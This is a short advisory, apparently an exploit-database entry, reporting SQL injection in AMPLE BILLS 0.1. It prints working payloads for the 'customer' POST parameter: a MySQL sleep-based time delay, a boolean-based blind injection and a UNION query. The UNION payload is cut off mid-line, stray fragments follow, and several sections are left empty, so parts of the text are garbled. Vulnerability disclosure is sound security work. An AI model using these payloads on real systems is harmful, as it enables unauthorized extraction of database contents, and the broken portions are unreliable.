AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.
## Title: AMPLE BILLS 0.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/13/2024
## Vendor:
## Software:
## Reference:
## Description:
The customer parameter (#1*) appears to be vulnerable to SQL injection
attacks. The payload (select*from(select(sleep(20)))a) was submitted
in the customer parameter. The application took 20017 milliseconds to
respond to the request, compared with 4 milliseconds for the original
request, indicating that the injected SQL command caused a time delay.
The database appears to be MySQL. The attacker can get all information
from the system by using this vulnerability!
STATUS: HIGH- Vulnerability
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: customer=(-2876) OR
5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: customer=(-8147) UNION ALL SELECT
- 04/13/2024
## Reproduce:
## Proof and Exploit:
## Time spent: